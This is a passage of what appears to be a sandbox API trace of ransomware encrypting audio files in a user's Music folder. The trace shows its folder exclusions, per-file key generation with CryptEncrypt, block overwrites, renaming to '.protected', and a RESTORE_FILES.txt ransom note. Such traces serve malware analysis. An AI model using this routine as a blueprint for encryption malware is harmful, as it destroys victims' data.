(lpFirst="ATg-8CnAReIP.mp3", lpSrch=".protected") returned 0x0 [0092.303] lstrcmpW (lpString1="ATg-8CnAReIP.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.303] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.303] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\ATg-8CnAReIP.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\atg-8cnareip.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.303] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\ATg-8CnAReIP.mp3") returned 109 [0092.303] StrStrW (lpFirst="ATg-8CnAReIP.mp3", lpSrch=".txt") returned 0x0 [0092.303] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\ATg-8CnAReIP.mp3") returned 109 [0092.303] StrStrW (lpFirst="ATg-8CnAReIP.mp3", lpSrch=".rar") returned 0x0 [0092.303] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\ATg-8CnAReIP.mp3") returned 109 [0092.303] StrStrW (lpFirst="ATg-8CnAReIP.mp3", lpSrch=".zip") returned 0x0 [0092.303] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.304] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.304] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.305] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.305] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.305] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.305] CloseHandle (hObject=0x14c) returned 1 [0092.305] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\ATg-8CnAReIP.mp3.protected") returned 119 [0092.305] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\ATg-8CnAReIP.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\atg-8cnareip.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\ATg-8CnAReIP.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\atg-8cnareip.mp3.protected")) returned 1 [0092.306] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.306] lstrcmpiW (lpString1="b4anS5I7R0HxUA.mp3", lpString2="Windows") returned -1 [0092.306] lstrcmpiW (lpString1="b4anS5I7R0HxUA.mp3", lpString2="Program Files") returned -1 [0092.306] lstrcmpiW (lpString1="b4anS5I7R0HxUA.mp3", lpString2="Program Files (x86)") returned -1 [0092.306] lstrcmpiW (lpString1="b4anS5I7R0HxUA.mp3", lpString2="$Recycle.bin") returned 1 [0092.306] lstrcmpiW (lpString1="b4anS5I7R0HxUA.mp3", lpString2="System Volume Information") returned -1 [0092.306] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\b4anS5I7R0HxUA.mp3") returned 111 [0092.306] StrStrIW (lpFirst="b4anS5I7R0HxUA.mp3", lpSrch=".protected") returned 0x0 [0092.306] lstrcmpW (lpString1="b4anS5I7R0HxUA.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.306] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.306] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\b4anS5I7R0HxUA.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\b4ans5i7r0hxua.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.306] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\b4anS5I7R0HxUA.mp3") returned 111 [0092.306] StrStrW (lpFirst="b4anS5I7R0HxUA.mp3", lpSrch=".txt") returned 0x0 [0092.306] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\b4anS5I7R0HxUA.mp3") returned 111 [0092.306] StrStrW (lpFirst="b4anS5I7R0HxUA.mp3", lpSrch=".rar") returned 0x0 [0092.306] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\b4anS5I7R0HxUA.mp3") returned 111 [0092.306] StrStrW (lpFirst="b4anS5I7R0HxUA.mp3", lpSrch=".zip") returned 0x0 [0092.306] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0xa72, lpOverlapped=0x0) returned 1 [0092.307] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffff58e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.307] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xa72, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0xa72, lpOverlapped=0x0) returned 1 [0092.307] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.307] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.307] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.307] CloseHandle (hObject=0x14c) returned 1 [0092.307] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\b4anS5I7R0HxUA.mp3.protected") returned 121 [0092.307] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\b4anS5I7R0HxUA.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\b4ans5i7r0hxua.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\b4anS5I7R0HxUA.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\b4ans5i7r0hxua.mp3.protected")) returned 1 [0092.308] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.308] lstrcmpiW (lpString1="CqEOO vwmmgKIbdKawC0.mp3", lpString2="Windows") returned -1 [0092.308] lstrcmpiW (lpString1="CqEOO vwmmgKIbdKawC0.mp3", lpString2="Program Files") returned -1 [0092.308] lstrcmpiW (lpString1="CqEOO vwmmgKIbdKawC0.mp3", lpString2="Program Files (x86)") returned -1 [0092.308] lstrcmpiW (lpString1="CqEOO vwmmgKIbdKawC0.mp3", lpString2="$Recycle.bin") returned 1 [0092.308] lstrcmpiW (lpString1="CqEOO vwmmgKIbdKawC0.mp3", lpString2="System Volume Information") returned -1 [0092.308] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\CqEOO vwmmgKIbdKawC0.mp3") returned 117 [0092.308] StrStrIW (lpFirst="CqEOO vwmmgKIbdKawC0.mp3", lpSrch=".protected") returned 0x0 [0092.308] lstrcmpW (lpString1="CqEOO vwmmgKIbdKawC0.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.308] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.308] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\CqEOO vwmmgKIbdKawC0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\cqeoo vwmmgkibdkawc0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.309] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\CqEOO vwmmgKIbdKawC0.mp3") returned 117 [0092.309] StrStrW (lpFirst="CqEOO vwmmgKIbdKawC0.mp3", lpSrch=".txt") returned 0x0 [0092.309] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\CqEOO vwmmgKIbdKawC0.mp3") returned 117 [0092.309] StrStrW (lpFirst="CqEOO vwmmgKIbdKawC0.mp3", lpSrch=".rar") returned 0x0 [0092.309] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\CqEOO vwmmgKIbdKawC0.mp3") returned 117 [0092.309] StrStrW (lpFirst="CqEOO vwmmgKIbdKawC0.mp3", lpSrch=".zip") returned 0x0 [0092.309] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.310] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.310] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.310] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.310] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.310] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.310] CloseHandle (hObject=0x14c) returned 1 [0092.310] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\CqEOO vwmmgKIbdKawC0.mp3.protected") returned 127 [0092.310] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\CqEOO vwmmgKIbdKawC0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\cqeoo vwmmgkibdkawc0.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\CqEOO vwmmgKIbdKawC0.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\cqeoo vwmmgkibdkawc0.mp3.protected")) returned 1 [0092.311] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.311] lstrcmpiW (lpString1="DgeJFKIe.m4a", lpString2="Windows") returned -1 [0092.311] lstrcmpiW (lpString1="DgeJFKIe.m4a", lpString2="Program Files") returned -1 [0092.311] lstrcmpiW (lpString1="DgeJFKIe.m4a", lpString2="Program Files (x86)") returned -1 [0092.311] lstrcmpiW (lpString1="DgeJFKIe.m4a", lpString2="$Recycle.bin") returned 1 [0092.311] lstrcmpiW (lpString1="DgeJFKIe.m4a", lpString2="System Volume Information") returned -1 [0092.311] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\DgeJFKIe.m4a") returned 105 [0092.311] StrStrIW (lpFirst="DgeJFKIe.m4a", lpSrch=".protected") returned 0x0 [0092.311] lstrcmpW (lpString1="DgeJFKIe.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0092.311] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.311] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\DgeJFKIe.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\dgejfkie.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\DgeJFKIe.m4a") returned 105 [0092.311] StrStrW (lpFirst="DgeJFKIe.m4a", lpSrch=".txt") returned 0x0 [0092.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\DgeJFKIe.m4a") returned 105 [0092.311] StrStrW (lpFirst="DgeJFKIe.m4a", lpSrch=".rar") returned 0x0 [0092.312] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\DgeJFKIe.m4a") returned 105 [0092.312] StrStrW (lpFirst="DgeJFKIe.m4a", lpSrch=".zip") returned 0x0 [0092.312] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.312] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.312] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.312] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.312] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.312] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.312] CloseHandle (hObject=0x14c) returned 1 [0092.313] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\DgeJFKIe.m4a.protected") returned 115 [0092.313] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\DgeJFKIe.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\dgejfkie.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\DgeJFKIe.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\dgejfkie.m4a.protected")) returned 1 [0092.313] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.313] lstrcmpiW (lpString1="faR8rvBC.wav", lpString2="Windows") returned -1 [0092.313] lstrcmpiW (lpString1="faR8rvBC.wav", lpString2="Program Files") returned -1 [0092.313] lstrcmpiW (lpString1="faR8rvBC.wav", lpString2="Program Files (x86)") returned -1 [0092.313] lstrcmpiW (lpString1="faR8rvBC.wav", lpString2="$Recycle.bin") returned 1 [0092.313] lstrcmpiW (lpString1="faR8rvBC.wav", lpString2="System Volume Information") returned -1 [0092.313] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\faR8rvBC.wav") returned 105 [0092.313] StrStrIW (lpFirst="faR8rvBC.wav", lpSrch=".protected") returned 0x0 [0092.313] lstrcmpW (lpString1="faR8rvBC.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.313] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.313] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\faR8rvBC.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\far8rvbc.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.314] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\faR8rvBC.wav") returned 105 [0092.314] StrStrW (lpFirst="faR8rvBC.wav", lpSrch=".txt") returned 0x0 [0092.314] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\faR8rvBC.wav") returned 105 [0092.314] StrStrW (lpFirst="faR8rvBC.wav", lpSrch=".rar") returned 0x0 [0092.314] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\faR8rvBC.wav") returned 105 [0092.314] StrStrW (lpFirst="faR8rvBC.wav", lpSrch=".zip") returned 0x0 [0092.314] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.314] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.314] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.314] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.315] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.315] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.315] CloseHandle (hObject=0x14c) returned 1 [0092.315] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\faR8rvBC.wav.protected") returned 115 [0092.315] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\faR8rvBC.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\far8rvbc.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 